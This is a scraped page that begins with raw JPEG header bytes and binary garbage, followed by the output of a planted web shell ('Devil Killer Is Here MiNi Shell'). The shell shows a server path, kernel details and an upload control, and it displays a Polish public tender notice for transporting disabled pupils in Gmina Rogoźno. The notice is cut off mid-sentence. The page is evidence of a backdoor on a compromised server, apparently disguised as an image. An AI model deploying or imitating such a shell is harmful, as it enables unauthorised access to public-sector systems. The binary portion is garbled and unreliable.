JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230724/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230724/0032250701-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Dowóz uczniów niepełnosprawnych zamieszkałych na terenie Gminy Rogoźno do placówek oświatowych wraz z zapewnieniem opieki w czasie dowozu w okresie od 1 września 2023 roku do 30 czerwca 2024 roku </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">CENTRUM USŁUG WSPÓLNYCH W ROGOŹNIE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 364970475</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Krótka 7</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Rogoźno</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">64-610</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL418 - Poznański</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">67 2617685</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@cuw.rogozno.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.rogozno.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> oswiatowa </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dowóz uczniów niepełnosprawnych zamieszkałych na terenie Gminy Rogoźno do placówek oświatowych wraz z zapewnieniem opieki w czasie dowozu w okresie od 1 września 2023 roku do 30 czerwca 2024 roku </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-2af071d7-2a13-11ee-a60c-9ec5599dddc1</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00322507</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-07-24</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/rogozno <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/rogozno - adres Platformy zakupowej zamawiającego.<br/>Szczegóły w SWZ.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Komunikacja między Zamawiającym a Wykonawcami odbywa się w formie elektronicznej, za pośrednictwem platformazakupowa.pl pod adresem:<br/>https://platformazakupowa.pl/pn/rogozno.<br/><br/>2. W celu skrócenia czasu udzielenia odpowiedzi na pytania komunikacja między zamawiającym, a wykonawcami odbywa się za pośrednictwem platformazakupowa.pl i formularza „Wyślij wiadomość do zamawiającego”. Za datę przekazania (wpływu) oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się datę ich przesłania za pośrednictwem platformazakupowa.pl poprzez kliknięcie przycisku „Wyślij wiadomość do zamawiającego”, po których pojawi się komunikat, że wiadomość została wysłana do Zamawiającego.<br/><br/>3. Zamawiający będzie przekazywał wykonawcom informacje za pośrednictwem platformazakupowa.pl. Informacje dotyczące<br/>odpowiedzi na pytania, zmiany specyfikacji, zmiany terminu składania i otwarcia ofert Zamawiający będzie zamieszczał na platformie w sekcji „Komunikaty”. Korespondencja, której zgodnie z obowiązującymi przepisami adresatem jest konkretny wykonawca, będzie przekazywana za pośrednictwem platformazakupowa.pl do konkretnego wykonawcy<br/><br/>4. Wykonawca jako podmiot profesjonalny ma obowiązek sprawdzania komunikatów i wiadomości bezpośrednio na platformazakupowa.pl przesłanych przez Zamawiającego, gdyż system powiadomień może ulec awarii lub powiadomienie może trafić do folderu SPAM.<br/><br/>5. Zamawiający, zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 30 grudnia 2020r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020r. poz. 2452), określa niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na platformazakupowa.pl, tj.:<br/>a) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>b) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja,<br/>jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>c) zainstalowana dowolna, inna przeglądarka internetowa niż Internet Explorer,<br/>d) włączona obsługa JavaScript,<br/>e) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>f) Szyfrowanie na platformazakupowa.pl odbywa się za pomocą protokołu TLS 1.3.<br/>g) Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu<br/>lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/><br/>6. Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia publicznego:<br/>a) akceptuje warunki korzystania z platformazakupowa.pl określone w Regulaminie zamieszczonym na stronie internetowej pod<br/>linkiem w zakładce „Regulamin” oraz uznaje go za wiążący,<br/>b) zapoznał i stosuje się do Instrukcji składania ofert/wniosków dostępnej pod linkiem: https://drive.google.com/file/d 1Kd1DttbBeiNWt4q4slS4t76lZVKPbkyD/view<br/><br/>7. Zamawiający nie ponosi odpowiedzialności za złożenie oferty w sposób niezgodny z Instrukcją korzystania z platformazakupowa.pl, w szczególności za sytuację, gdy Zamawiający zapozna się z treścią oferty przed upływem terminu składania ofert (np. złożenie oferty w zakładce „Wyślij wiadomość do zamawiającego”). Taka oferta zostanie uznana przez Zamawiającego za<br/>ofertę handlową i nie będzie brana pod uwagę w przedmiotowym postępowaniu ponieważ nie został spełniony obowiązek narzucony<br/>w art. 221 Ustawy Prawo Zamówień Publicznych.<br/><br/>8. Zamawiający informuje, że instrukcje korzystania z platformazakupowa.pl dotyczące w szczególności logowania, składania wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych czynności podejmowanych w niniejszym postępowaniu przy użyciu platformazakupowa.pl znajdują się w zakładce „Instrukcje dla Wykonawców” na stronie internetowej pod adresem:<br/>https://platformazakupowa.pl/strona/45-instrukcje.<br/>Szczegóły w SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych, zwane dalej<br/>„RODO”) (Dz. U. UE. L. 119.1 z 04.05.2016) informuję, iż:<br/><br/>1) Administratorem Pani/Pana danych osobowych jest Centrum Usług Wspólnych z siedzibą mieszczącą się pod adresem: ul. Krótka<br/>7, 64-610 Rogoźno. Z administratorem można skontaktować się mailowo: sekretariat@cuw.rogozno.pl lub pisemnie na adres siedziby administratora.<br/><br/>2) Administrator powołał Inspektora Ochrony Danych, z którym można skontaktować się mailowo: iod@rogozno.pl.<br/><br/>3) Dane osobowe będą przetwarzane w celu związanym z postępowaniem o udzielenie zamówienia publicznego.<br/><br/>4) Dane osobowe będą przetwarzane przez okres zgodnie z art. 78 ust. 1 i 4 ustawy z dnia z dnia 11 września 2019 r. Prawo<br/>zamówień publicznych (Dz. U. z 2022 r. poz. 1710 ze zm.), zwanej dalej Pzp, przez okres 4 lat od dnia zakończenia postępowania o<br/>udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy.<br/><br/>5) Podstawą prawną przetwarzania danych jest art. 6 ust. 1 lit. c) ww. Rozporządzenia w związku z przepisami Pzp.<br/><br/>6) Odbiorcami Pani/Pana danych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o<br/>art. 18 oraz art. 74 ust. 4 Pzp.<br/><br/>7) Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z Pzp.<br/><br/>8) Osoba, której dane dotyczą ma prawo do:<br/>- dostępu do treści swoich danych oraz możliwości ich poprawiania, sprostowania, ograniczenia przetwarzania,<br/>- w przypadku gdy przetwarzanie danych odbywa się z naruszeniem przepisów Rozporządzenia służy prawo wniesienia skargi do<br/>organu nadzorczego tj. Prezesa Urzędu Ochrony Danych Osobowych, ul. Stawki 2,00- 193 Warszawa,<br/><br/>9) Osobie, której dane dotyczą nie przysługuje:<br/>- w związku z art. 17 ust. 3 lit. b, d lub e Rozporządzenia prawo do usunięcia danych osobowych;<br/>- prawo do przenoszenia danych osobowych, o którym mowa w art. 20 Rozporządzenia;<br/>- na podstawie art. 21 Rozporządzenia prawo sprzeciwu, wobec przetwarzania danych osobowych.<br/><br/>10) W przypadku gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 Rozporządzenia, wymagałoby niewspółmiernie<br/>dużego wysiłku, Administrator może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji mających na celu<br/>sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego.<br/><br/>11) Skorzystanie przez osobę, której dane dotyczą, z uprawnienia do sprostowania lub uzupełnienia danych osobowych, o którym<br/>mowa w art. 16 Rozporządzenia, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego lub<br/>konkursu ani zmianą postanowień umowy w zakresie niezgodnym z Pzp.<br/><br/>12) Wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 Rozporządzenia, nie ogranicza przetwarzania danych osobowych do<br/>czasu zakończenia postępowania o udzielenie zamówienia publicznego.<br/><br/>13) W przypadku danych osobowych zamieszczonych przez Administratora w Biuletynie Zamówień Publicznych, prawa, o których<br/>mowa w art. 15 i art. 16 Rozporządzenia, są wykonywane w drodze żądania skierowanego do Administratora.<br/><br/>Z uwagi na ograniczenia ilości znaków pozostałe zapisy dot. RODO patrz SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">CUW.454.1.2.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiot zamówienia obejmuje:<br/>dowóz uczniów niepełnosprawnych zamieszkałych na terenie Gminy Rogoźno do placówek oświatowych wraz z zapewnieniem opieki w czasie dowozu w okresie od 1 września 2023 roku do 30 czerwca 2024 roku.<br/>Uczniowie dowożeni będą z terenu Gminy Rogoźno do następujących placówek oświatowych:<br/>Trasa nr 1<br/>5 osób w tym 1 na wózku inwalidzkim + opiekun<br/>Specjalny Ośrodek Szkolno-Wychowawczy dla Dzieci Niewidomych w Owińskach<br/>Plac Przemysława 9 <br/>62-005 Owińska<br/>oraz <br/>Ośrodek Szkolno – Wychowawczy dla Dzieci Niesłyszących w Poznaniu<br/>ul. Bydgoska 4a<br/>61-127 Poznań<br/><br/>Owieczki – Rogoźno - Budziszewko- Specjalny Ośrodek Szkolno-Wychowawczy dla Dzieci Niewidomych w Owińskach, Ośrodek Szkolno – Wychowawczy dla Dzieci Niesłyszących w Poznaniu <br/><br/>66 km (dojazd) + 66 km (powrót) = 132 km<br/>Dzienny limit kilometrów: około 132 km.<br/>Trasa nr 2<br/>4 osoby + opiekun<br/>Rogoźno OSiR- SP Budziszewko, SP Parkowo, SP Gościejewo <br/>41 km (dojazd) + 41 km (powrót) = 82 km<br/>Dzienny limit kilometrów: około 82 km.<br/>Trasa nr 3<br/>30 osób + opiekun<br/>Szkoła Podstawowa im. Józefa Wybickiego<br/>Parkowo 6<br/>64-608 Parkowo<br/>oraz<br/>Przedszkole Samorządowe &#34;Słoneczne Skrzaty” <br/>Parkowo 114a<br/>64-608 Parkowo<br/>oraz<br/>Zespół Szkół Specjalnych w Kowanówku<br/>ul. Miłowody 2<br/>64-600 Oborniki<br/><br/>Budziszewko - Rogoźno - Owczegłowy – Cieśle - Ruda – Gościejewo – Owieczki – Wełna – Szkoła Podstawowa im. Józefa Wybickiego, Parkowo 6 - Przedszkole Słoneczne Skrzaty, Parkowo 114a –Parkowo 143 – Zespół Szkół Specjalnych w Kowanówku, ul. Miłowody 2a<br/><br/>62,9 km (dojazd) + 62,9 km (powrót) = około 125,8 km<br/>Dzienny limit kilometrów : około 125,8 km.<br/><br/>W okresie od 24.06.2024r. – 28.06.2024r.<br/>1 osoba + opiekun<br/><br/>Przedszkole Samorządowe &#34;Słoneczne Skrzaty” <br/>Parkowo 114a<br/>64-608 Parkowo<br/> <br/>Rogoźno -– Przedszkole Słoneczne Skrzaty, Parkowo 114a <br/><br/>9,5 km (dojazd) + 9,5 km (powrót) = około 19 km<br/>Dzienny limit kilometrów: około 19 km. <br/><br/>Trasa nr 4:<br/>11 osób w tym 1 osoba na wózku + opiekun<br/>Specjalny Ośrodek Szkolno – Wychowawczy<br/>ul. Kcyńska 48 <br/>ul. Janowiecka 22<br/>62-100 Wągrowiec<br/>oraz<br/> Zespół Szkół nr 1<br/>ul. Kcyńska 48<br/>62-100 Wągrowiec<br/>oraz <br/> Szkoła Podstawowa nr 3<br/>im. Mikołaja Kopernika <br/>ul. Letnia 1<br/>62-100 Wągrowiec<br/><br/>47,5 km (dojazd) + 47,5 km (powrót) = około 95 km<br/>Dzienny limit kilometrów : około 95 km.<br/><br/>Boguniewo – Józefinowo – Międzylesie- Rogoźno – Owczegłowy – Marlewo – Pruśce- Wągrowiec<br/><br/>Trasa nr 5: <br/>6 osób w tym 1 na wózku inwalidzkim + opiekun<br/>Szkoła Podstawowa im. Jana Pawła II w Pruścach<br/>Pruśce 30<br/>64-610 Rogoźno<br/>oraz<br/>Zespół Szkół nr 1<br/>ul. Kcyńska 48<br/>62-100 Wągrowiec<br/><br/>oraz<br/>Progressio<br/>Centrum Wspomagania Rozwoju <br/>i Terapii Dziecka<br/>ul. Przemysłowa 14<br/>62-100 Wągrowiec<br/>oraz <br/>Specjalny Ośrodek Szkolno - Wychowawczy<br/>ul. Gnieźnieńska 7<br/>62 – 270 Kłecko<br/><br/>74 km (dojazd) + 74 km (powrót) = około 148 km<br/>Dzienny limit kilometrów : około 148 km.<br/><br/>Budziszewko - Rogoźno – Wągrowiec „Progressio” Centrum Wspomagania Rozwoju i Terapii Dziecka, ul. Przemysłowa 14, - Wągrowiec Zespół Szkół nr 1, ul. Kcyńska 48, – Ośrodek Szkolno – Wychowawczy, ul. Gnieźnieńska 7, Kłecko.<br/> <br/>74 km (dojazd) + 74 km (powrót) = około 148 km<br/><br/>Szczegóły patrz SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60130000-8 - Usługi w zakresie specjalistycznego transportu drogowego osób</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2023-09-01 do 2024-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Ocenie będą podlegały oferty ważne tj. oferty niepodlegające odrzuceniu.<br/><br/>2. Przy wyborze oferty Zamawiający będzie się kierować następującymi <br/>kryteriami oceny ofert:<br/>1) Cena ( C ) - 60%<br/>2) Wiek pojazdu ( Wp ) - 40%<br/>3) SUMA - 100%<br/><br/>3. Zasady oceny kryterium „Cena” (C).<br/>W przypadku kryterium „Cena”, oferta otrzyma zaokrągloną do dwóch miejsc po przecinku ilość punktów wynikającą z działania:<br/>Cmin<br/>Pi ( C ) = ----------------------------------- X Max ( C )<br/>Ci<br/><br/>gdzie:<br/><br/>Pi(C) - ilość punktów jakie otrzyma oferta „i” za kryterium „Cena”<br/>Cmin - najniższa cena spośród wszystkich ważnych i nie odrzuconych ofert<br/>Ci - cena oferty „i”<br/>Max (C) - maksymalna ilość punktów jakie może otrzymać oferta za kryterium „Cena&#34;<br/><br/>4. Zasady oceny kryterium „Wiek pojazdu” ( Wp ).<br/>Zamawiający w ramach kryterium „Wiek pojazdu” będzie przyznawał punkty za przedstawione w ofercie 5 pojazdów w następujący sposób:<br/>16 - 20 letni pojazd – oferta otrzyma 0 pkt.<br/>11 - 15 letni pojazd – oferta otrzyma 2 pkt.<br/>6 - 10 letni pojazd – oferta otrzyma 4 pkt.<br/>0 - 5 letni pojazd – oferta otrzyma 8 pkt.<br/>Łączna suma do uzyskania to 40 pkt.<br/>Przy wykazaniu w Formularzu ofertowym więcej niż 5 pojazdów Zamawiający wybierze do oceny 5 najmłodszych pojazdów.<br/><br/>5. Ostateczna ocena punktowa oferty.<br/>Ocena punktowa oferty „i” będzie zaokrągloną do dwóch miejsc po przecinku liczbą wynikającą ze zsumowania ilości punktów, jakie<br/>otrzyma ta oferta za poszczególne kryteria:<br/>Pi = Σ Pi (X)<br/><br/>gdzie :<br/><br/>Pi - ocena punktowa oferty „i”;<br/>Σ Pi (X) - suma ilości punktów jakie otrzyma oferta „i” za poszczególne kryteria.<br/><br/>6. Za najkorzystniejszą ofertę zostanie uznana oferta, która otrzyma najwyższą ilość punktów według kryteriów oceny ofert<br/>przyjętych w SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Wiek pojazdu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit a</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit b</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit c</p> <p class="mb-0">Art. 109 ust. 1 pkt 3</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> W postępowaniu mogą wziąć udział Wykonawcy, którzy spełniają następujące warunki udziału w postępowaniu:<br/><br/>a)	zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.<br/><br/>b)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, jeśli to wynika z odrębnych przepisów:<br/>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że posiada dokument licencji lub zezwolenia na wykonywanie zawodu przewoźnika drogowego w zakresie transportu drogowego na terenie co najmniej 